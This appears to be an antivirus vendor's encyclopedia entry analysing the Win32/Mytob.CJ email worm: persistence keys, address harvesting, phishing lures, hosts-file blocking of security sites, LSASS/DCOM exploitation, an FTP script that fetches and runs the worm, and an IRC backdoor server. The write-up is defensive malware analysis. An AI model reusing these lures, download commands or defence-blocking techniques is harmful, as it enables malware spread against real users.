Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

Win32/Mytob.CJ

   
Aliases: W32.Mytob.U@mm (Symantec), Win32.Worm.Mytob.GQ (Bitdefender), Net-Worm.Win32.Mytob.bx (Kaspersky), W32/Mytob.JW@mm (F-Prot)
Type: Mass Mailing E-mail Worm
Systems Affected: 32-Bit Windows

Introduction:

MyTob.CJ is a typical mass mailing e-mail worm that is approximately 50 Kb - 55 Kb. The worm is runtime compressed by UPack, an executable runtime protector.

Installation and Autostart Techniques:

Upon execution, the worm copies itself into the System32 folder as "taskgmrs.exe" and drops the file HELLMSN.EXE (6050 bytes in size) into the root directory (normally C:\). HELLMSN.EXE is detected by NOD32 as W32/Mytob.I (MSN Messenger Spreading Component) and is runtime compressed by FSG.

Mytob.CJ creates copies of itself in the root directory using the names:

"funny_pic.scr"
"my_photo2005.scr "
"see_this!!.scr"

The worm creates a mutex "H-E-L-L-B-O-T" to avoid multiple running instances of itself on the same machine.

The worm adds the following keys to the registry to make sure that it runs every time Windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINTASK" = "taskgmrs.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINTASK" = "taskgmrs.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"WINTASK" = "taskgmrs.exe"

MyTob.AW also adds the following registry keys:

HKLM\Software\Microsoft\OLE
"WINTASK" = "taskgmrs.exe"

HKCU\Software\Microsoft\OLE
"WINTASK" = "taskgmrs.exe"

HKLM\System\CurrentControlSet\Control\Lsa
"WINTASK" = "taskgmrs.exe"

HKCU\System\CurrentControlSet\Control\Lsa
"WINTASK" = "taskgmrs.exe"

Mytob.CJ monitors these registry keys and recreates them if they are not present anymore.

E-mail Harvesting:

The worm scans all fixed disks and is designed to collect e-mail addresses out of files which match one of the following file extensions:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl

The worm has a bug surrounding stringcat and compare with the WIN32_FIND_DATA results. This causes the worm will to open and scan files for email addresses when at least one character matches one of the characters in the file extension list in the correct order.

In technical terms, that means the worm compares the file extension via 'instring function/substring function'.

Example:

The worm will search for e-mail addresses in files where the file extension matches
*.htm, *.ht, or *.h.

Mytob.CJ collects also e-mail addresses from the Windows Address Book and from the following folders:

%Windir%\Temporary Internet Files
%Userprofile%\Local Settings\Temporary Internet Files
%System%

DNS Resolving:

The worm performs DNS e-mail-exchange-queries to find an appropriate mail server for each domain it tries to send itself to. If this DNS request for the mailserver fails, the worm tries to guess the e-mail server adding in front of the domain name the following prefixes:

gate.
mx.
mail.
smtp.
mx1.
mxs.
mail1.
relay.
ns.

E-mail Sender:

The worm generates the sender's e-mail addresses using the following list of names:

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom

to which it randomly adds a domain from an encrypted list of the following domain names stored in the worm:

aol.com cia.gov fbi.gov hotmail.com juno.com msn.com yahoo.com

Mytob.CJ uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.

E-mail Subject Lines:

MyTob.CJ randomly selects an e-mail subject out of the following list:

Error
Status
Server Report
Mail Transaction Failed
Mail Delivery System
hello
Good day

The e-mail subjects are encrypted and stored in the worm.

Message Body:

The e-mail contains one of the following message texts:

Mail transaction failed. Partial message is available.

The message contains Unicode characters and has been sent as a binary attachment.

The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.

The original message was included as an attachment.

Here are your banks documents.

E-mail with a blank message body or containing random strings may also be sent.

E-mail Attachments:

The worm sends a copy of itself using one of the following file names:

body
message
test
data
file
text
doc
readme
document

with one of the following file extensions:

bat
cmd
exe
scr
pif
zip

The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions, the first chosen from the following list:

htm
txt
doc

The second extension is chosen from the following list and is separated from the first extension by a large number of spaces to hide the executable file extension:

pif
scr
exe

Example: attachment "text.zip" may contain the file "text.txt {spaces}.scr"

The worm avoids e-mail addresses which contain parts of the following list:

.gov, .mil, abuse, accoun, acketst, admin, anyone, arin., avp, be_loyal:, berkeley,
borlan, bsd, bugs, certific, contact, example, fcnz, feste, fido, foo., fsf., gnu, gold-certs,
google, gov., help, hotmail, iana, ibm.com, icrosof, icrosoft, ietf, info, inpris, isc.o,
isi.e, kernel, linux, listserv, math, mit.e, mozilla, msn., mydomai, nobody, nodomai,
noone, not, nothing, ntivi, page, panda, pgp, postmaster, privacy, rating, rfc-ed, ripe.,
root, ruslis, samples, secur, sendmail, service, site, soft, somebody, someone, sopho,
spm, submit, support, syma, tanford.e, the.bat, unix, usenet, utgers.ed, webmaster,
www, you, your, -._!, -._!@

Example: Since the worm avoids addresses with "icrosoft", both microsoft.com and Microsoft.com would be avoided.

Hostfile Manipulation:

The worm overwrites the present hosts file with the following data to avoid accessing these sites:

127.0.0.1 www.trendmicro.com
127.0.0.1 www.microsoft.com
127.0.0.1 trendmicro.com
127.0.0.1 rads.mcafee.com
127.0.0.1 customer.symantec.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 secure.nai.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 www.my-etrust.com
127.0.0.1 my-etrust.com
127.0.0.1 mast.mcafee.com
127.0.0.1 ca.com
127.0.0.1 www.ca.com
127.0.0.1 networkassociates.com
127.0.0.1 www.networkassociates.com
127.0.0.1 avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 kaspersky.com
127.0.0.1 www.f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 viruslist.com
127.0.0.1 www.viruslist.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mcafee.com
127.0.0.1 www.mcafee.com
127.0.0.1 sophos.com
127.0.0.1 www.sophos.com
127.0.0.1 symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 www.symantec.com

Exploiting Technologies:

The worm tries to connect to randomly generated IP addresses on port 445 to exploit the LSASS buffer overflow vulnerability [see MS04-011]. If the vulnerability exploit is successful, it executes code (shellcode) on the target machine, which instructs it to connect back to the source in order to retrieve a copy of the worm. (This copy is downloaded to the target machine by a created FTP Server-Connection using 2pac.txt FTP-Commands file)

The worm also takes advantage of the DCOM RPC vulnerability [see MS03-026] for spreading.

The 2pac.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
binary
get bingoo.exe
quit

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of the worm with the name "bingoo.exe" from the connecting system, and starts this file after downloading.

References:

http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Other Details:

The worm also provides IRC-Backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer

and connects to the following IRC server:

hellbot.j2ee.us

The worm tries to send copies via MSN Messenger to all online contacts in the contact list.

History: Analysis and Write-up by: Michael St. Neitzel